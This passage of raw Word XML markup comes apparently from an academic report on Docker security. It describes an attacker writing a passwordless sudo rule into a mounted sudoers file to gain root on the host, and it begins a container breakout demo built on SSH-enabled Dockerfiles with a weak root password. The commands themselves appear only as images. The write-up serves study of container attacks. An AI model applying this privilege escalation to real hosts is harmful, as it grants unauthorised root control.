        <w:t xml:space="preserve">attacker to run commands </w:t>
      </w:r>
      <w:r w:rsidR="00487F65">
        <w:t xml:space="preserve">using sudo </w:t>
      </w:r>
      <w:r w:rsidR="003C4F66">
        <w:t>without a password and is appended to the mount point /attacker/etc/sudoers.</w:t>
      </w:r>
      <w:r w:rsidR="00487F65">
        <w:t xml:space="preserve"> At this point, the attacker escalates his/her privilege to a root user and now can run any root commands on the Ubuntu laptop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E4773E" w14:textId="0CF7DEFC" w:rsidR="00C110E4" w:rsidRDefault="00C110E4" w:rsidP="00C110E4">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B26F791" wp14:editId="36152B05">
            <wp:extent cx="5229860" cy="457200"/>
            <wp:effectExtent l="0" t="0" r="889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29860" cy="457200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C321FCC" w14:textId="5C0888F2" w:rsidR="003C4F66" w:rsidRDefault="003C4F66" w:rsidP="00487F65">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="138" w:name="_Toc86858619"/>
      <w:bookmarkStart w:id="139" w:name="_Toc86867509"/>
      <w:r w:rsidRPr="00487F65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00487F65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00487F65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00487F65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidRPr="00487F65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00487F65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: appendi</w:t>
      </w:r>
      <w:r w:rsidR="00487F65" w:rsidRPr="00487F65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ng the syntax to run sudo commands without password.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138"/>
      <w:bookmarkEnd w:id="139"/>
    </w:p>
    <w:p w14:paraId="70136447" w14:textId="6C102318" w:rsidR="006554BD" w:rsidRPr="006554BD" w:rsidRDefault="00B11C32" w:rsidP="003719C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Figure 2</w:t>
      </w:r>
      <w:r w:rsidR="00817E95">
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F5764D">
        <w:t>shows</w:t>
      </w:r>
      <w:r w:rsidR="006B1D89">
        <w:t xml:space="preserve"> the evidence that the attacker </w:t>
      </w:r>
      <w:r w:rsidR="004E0E5B">
        <w:t>has</w:t>
      </w:r>
      <w:r w:rsidR="000079EE">
        <w:t xml:space="preserve"> now</w:t>
      </w:r>
      <w:r w:rsidR="004E0E5B">
        <w:t xml:space="preserve"> the ability to run </w:t>
      </w:r>
      <w:r w:rsidR="00464103">
        <w:t xml:space="preserve">any sudo commands as </w:t>
      </w:r>
      <w:r w:rsidR="00A369ED">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00464103">
        <w:t>root without supplying</w:t>
      </w:r>
      <w:r w:rsidR="00FE724B">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00464103">
        <w:t xml:space="preserve"> password.</w:t>
      </w:r>
      <w:r w:rsidR="000726B4">
        <w:t xml:space="preserve"> As a result, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00E91AC9">
        <w:t xml:space="preserve">manages to be part of the sudoers group using the </w:t>
      </w:r>
      <w:r w:rsidR="001F04AB">
        <w:t xml:space="preserve">privilege escalation technique. </w:t>
      </w:r>
      <w:r w:rsidR="00D9263A">
        <w:t xml:space="preserve">This means that the </w:t>
      </w:r>
      <w:r w:rsidR="00653D1D">
        <w:t xml:space="preserve">attacker </w:t>
      </w:r>
      <w:r w:rsidR="002F32B8">
        <w:t xml:space="preserve">becomes a root user and </w:t>
      </w:r>
      <w:r w:rsidR="00F95448">
        <w:t xml:space="preserve">can run any commands </w:t>
      </w:r>
      <w:r w:rsidR="00750A96">
        <w:t>on the host machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7AE4EA" w14:textId="6277827F" w:rsidR="005B46CB" w:rsidRDefault="00F85FF2" w:rsidP="006554BD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47185459" wp14:editId="26FD08A6">
            <wp:extent cx="4900295" cy="2895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901989" cy="2896601"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD63408" w14:textId="496D370B" w:rsidR="00B530C6" w:rsidRDefault="000D1AA5" w:rsidP="00464D55">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="140" w:name="_Toc86858620"/>
      <w:bookmarkStart w:id="141" w:name="_Toc86867510"/>
      <w:r w:rsidRPr="00464D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00464D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00464D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00464D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r w:rsidRPr="00464D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00464D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00BF7E92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00BE7D83" w:rsidRPr="00464D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r w:rsidR="00BF7E92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> user</w:t>
      </w:r>
      <w:r w:rsidR="006A1D35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidR="00BE7D83" w:rsidRPr="00464D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> added to the</w:t>
      </w:r>
      <w:r w:rsidR="00464D55" w:rsidRPr="00464D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudoers.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="140"/>
      <w:bookmarkEnd w:id="141"/>
    </w:p>
    <w:p w14:paraId="115A1DC4" w14:textId="23652EAB" w:rsidR="00902E23" w:rsidRDefault="00B178B4" w:rsidP="00B178B4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="142" w:name="_Toc87032938"/>
      <w:r>
        <w:t>Container breakout</w:t>
      </w:r>
      <w:bookmarkEnd w:id="142"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D03A0F6" w14:textId="3A52C836" w:rsidR="008D1C38" w:rsidRDefault="007D5772" w:rsidP="0005151D">
      <w:r>
        <w:t xml:space="preserve">This attack utilises a simple </w:t>
      </w:r>
      <w:r w:rsidR="00102EBA">
        <w:t>SSH service to demonstrate container to container attack or</w:t>
      </w:r>
      <w:r w:rsidR="00BA30AA">
        <w:t xml:space="preserve"> known as container breakout</w:t>
      </w:r>
      <w:r w:rsidR="00A51A1E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A51A1E">
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A51A1E">
        <w:t xml:space="preserve"> container to host attack</w:t>
      </w:r>
      <w:r w:rsidR="00CF242C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008C25AE">
        <w:t xml:space="preserve"> The attack</w:t>
      </w:r>
      <w:r w:rsidR="00E235F9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA10AA">
        <w:t xml:space="preserve">mainly </w:t>
      </w:r>
      <w:r w:rsidR="00E235F9">
        <w:t xml:space="preserve">uses two </w:t>
      </w:r>
      <w:r w:rsidR="001F7CB1">
        <w:t>Dockerfiles</w:t>
      </w:r>
      <w:r w:rsidR="00A42C7B">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="001F7CB1">
        <w:t xml:space="preserve"> one with </w:t>
      </w:r>
      <w:r w:rsidR="00A42C7B">
        <w:t xml:space="preserve">SSH port exposed and the other </w:t>
      </w:r>
      <w:r w:rsidR="00663FE1">
        <w:t>without SSH enabled</w:t>
      </w:r>
      <w:r w:rsidR="00B50477">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005A11B7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF7B0F">
        <w:t xml:space="preserve">In addition, </w:t>
      </w:r>
      <w:r w:rsidR="00C43C81">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidR="00DF7B0F">
        <w:t xml:space="preserve">alpine Docker image </w:t>
      </w:r>
      <w:r w:rsidR="00313DDC">
        <w:t xml:space="preserve">pulled from Docker Hub </w:t>
      </w:r>
      <w:r w:rsidR="00CE3C61">
        <w:t xml:space="preserve">is used to add </w:t>
      </w:r>
      <w:r w:rsidR="00080127">
        <w:t xml:space="preserve">necessary </w:t>
      </w:r>
      <w:r w:rsidR="00CE3C61">
        <w:t xml:space="preserve">tools </w:t>
      </w:r>
      <w:r w:rsidR="001C66F2">
        <w:t>and packages</w:t>
      </w:r>
      <w:r w:rsidR="001B4733">
        <w:t xml:space="preserve"> during the </w:t>
      </w:r>
      <w:r w:rsidR="00384B4B">
        <w:t>exploitation</w:t>
      </w:r>
      <w:r w:rsidR="00653001">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005A11B7">
        <w:t xml:space="preserve">Therefore, for </w:t>
      </w:r>
      <w:r w:rsidR="00CD531C">
        <w:t>this attack</w:t>
      </w:r>
      <w:r w:rsidR="00DF7B0F">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00CD531C">
        <w:t xml:space="preserve"> the implementation process starts creating the two Docker images locally.</w:t>
      </w:r>
      <w:r w:rsidR="002A2999">
        <w:t xml:space="preserve"> The first Dockerfile </w:t>
      </w:r>
      <w:r w:rsidR="00457801">
        <w:t xml:space="preserve">installs and configures </w:t>
      </w:r>
      <w:r w:rsidR="00D440A5">
        <w:t xml:space="preserve">OpenSSH server </w:t>
      </w:r>
      <w:r w:rsidR="00E07631">
        <w:t>when</w:t>
      </w:r>
      <w:r w:rsidR="00603E3F">
        <w:t xml:space="preserve"> a container starts</w:t>
      </w:r>
      <w:r w:rsidR="00BC2780">
        <w:t>, as shown in figure 30.</w:t>
      </w:r>
      <w:r w:rsidR="00A45516">
        <w:t xml:space="preserve"> OpenSSH is </w:t>
      </w:r>
      <w:r w:rsidR="00403A30">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00600266">
        <w:t xml:space="preserve"> protocol that provides </w:t>
      </w:r>
      <w:r w:rsidR="00AF2CCA">
        <w:t xml:space="preserve">a secure communication between </w:t>
      </w:r>
      <w:r w:rsidR="00D00849">
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidR="00A22937">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00D00849">
        <w:t xml:space="preserve"> over a network</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-856414830"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00BA2F88">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00BA2F88">
            <w:instrText xml:space="preserve"> CITATION ubu21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00E00DDF">
            <w:instrText xml:space="preserve"> \m doc213</w:instrText>
          </w:r>
          <w:r w:rsidR="00BA2F88">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[87, 88]</w:t>
          </w:r>
          <w:r w:rsidR="00BA2F88">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00D00849">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A22937">
        <w:t xml:space="preserve"> The Dockerfile </w:t>
      </w:r>
      <w:r w:rsidR="00D1670F">
        <w:t>is created bas</w:t>
      </w:r>
      <w:r w:rsidR="007E1052">
        <w:t xml:space="preserve">ed on Ubuntu </w:t>
      </w:r>
      <w:r w:rsidR="00186845">
        <w:t>16.04 base image.</w:t>
      </w:r>
      <w:r w:rsidR="007D2638">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00016D9D">
        <w:t xml:space="preserve">It also sets the root password </w:t>
      </w:r>
      <w:r w:rsidR="001432F2">
        <w:t>to “</w:t>
      </w:r>
      <w:r w:rsidR="001432F2" w:rsidRPr="00E71D03">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r w:rsidR="001432F2">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="004C691B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B36A2D">
        <w:t>inside the Docker container</w:t>
      </w:r>
      <w:r w:rsidR="008B50F7">
        <w:t>, as shown in the figure</w:t>
      </w:r>
      <w:r w:rsidR="00891E3B">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008B50F7">
        <w:t xml:space="preserve"> on line 4</w:t>
      </w:r>
      <w:r w:rsidR="007C4212">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00737CF4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089161D4" w14:textId="5314DA13" w:rsidR="004A2A67" w:rsidRDefault="00737CF4" w:rsidP="0005151D">
      <w:r>
        <w:t xml:space="preserve">Further, it exposes </w:t>
      </w:r>
      <w:r w:rsidR="001A62E9">
        <w:t>the default SSH port 22</w:t>
      </w:r>
      <w:r w:rsidR="008850B1">
        <w:t xml:space="preserve"> to allow the Docker container </w:t>
      </w:r>
      <w:r w:rsidR="009C24AD">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="008850B1">
        <w:t>listen on this port.</w:t>
      </w:r>
      <w:r w:rsidR="00711202">
        <w:t xml:space="preserve"> Finally,</w:t>
      </w:r>
      <w:r w:rsidR="007F424D">
        <w:t xml:space="preserve"> it starts the </w:t>
      </w:r>
      <w:r w:rsidR="00B84241">
        <w:t xml:space="preserve">OpenSSH </w:t>
      </w:r>
      <w:r w:rsidR="00320BCA">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00C94167">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00320BCA">
        <w:t xml:space="preserve">background when the container </w:t>
      </w:r>
      <w:r w:rsidR="005E163B">
        <w:t>is started.</w:t>
      </w:r>
      <w:r w:rsidR="00395C19">
        <w:t xml:space="preserve"> Similarly, the second Dockerfile </w:t>
      </w:r>
      <w:r w:rsidR="00C713D4">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="0015378C">
        <w:t>analogous</w:t>
      </w:r>
      <w:r w:rsidR="006047DF">
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="005712C2">
        <w:t xml:space="preserve"> the first Dockerfile</w:t>
      </w:r>
      <w:r w:rsidR="008B5EA3">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00857308">
        <w:t xml:space="preserve"> except </w:t>
      </w:r>
      <w:r w:rsidR="008B5EA3">
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r w:rsidR="00857308">
        <w:t>does not expose the SSH port</w:t>
      </w:r>
      <w:r w:rsidR="006047DF">
        <w:t xml:space="preserve"> 22</w:t>
      </w:r>
      <w:r w:rsidR="008F2B0C">
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidR="008B5EA3">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="008F2B0C">
        <w:t>containers</w:t>
      </w:r>
      <w:r w:rsidR="00944DE3">
        <w:t>, as shown in figure 31</w:t>
      </w:r>
      <w:r w:rsidR="008F2B0C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FC05B5">
        <w:t xml:space="preserve"> For clarity, each Dockerfile </w:t>
      </w:r>
      <w:r w:rsidR="00E85A84">
        <w:t xml:space="preserve">provides comments for each command used </w:t>
      </w:r>
      <w:r w:rsidR="000A1D54">
        <w:t>to create the Docker images files</w:t>
      </w:r>
      <w:r w:rsidR="004C292C">
        <w:t>, as shown in figure</w:t>
      </w:r>
      <w:r w:rsidR="00072AF0">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="004C292C">
        <w:t xml:space="preserve"> 30 and 31.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D6A9ED" w14:textId="5EC19275" w:rsidR="00101FE3" w:rsidRDefault="00101FE3" w:rsidP="006A275A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20404398" wp14:editId="39E658A5">
            <wp:extent cx="4783925" cy="26416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84436" cy="2641882"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="431C7E53" w14:textId="65F2A2C6" w:rsidR="00944DE3" w:rsidRDefault="00944DE3" w:rsidP="007F5E4B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="143" w:name="_Toc86858621"/>
      <w:bookmarkStart w:id="144" w:name="_Toc86867511"/>
      <w:r w:rsidRPr="007F5E4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="007F5E4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="007F5E4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="007F5E4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00EF78FF" w:rsidRPr="007F5E4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Dockerfile for OpenSSH-server with </w:t>
      </w:r>
      <w:r w:rsidR="007F5E4B" w:rsidRPr="007F5E4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SSH port exposed.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="143"/>
      <w:bookmarkEnd w:id="144"/>
    </w:p>
    <w:p w14:paraId="72D81F06" w14:textId="77777777" w:rsidR="004F1253" w:rsidRPr="004F1253" w:rsidRDefault="004F1253" w:rsidP="004F1253"/>
    <w:p w14:paraId="39A41BC0" w14:textId="0409D968" w:rsidR="00C322CB" w:rsidRDefault="00CD4C4C" w:rsidP="00CD4C4C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4079B2CE" wp14:editId="6003CF7C">
            <wp:extent cx="4556760" cy="23939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556760" cy="2393950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
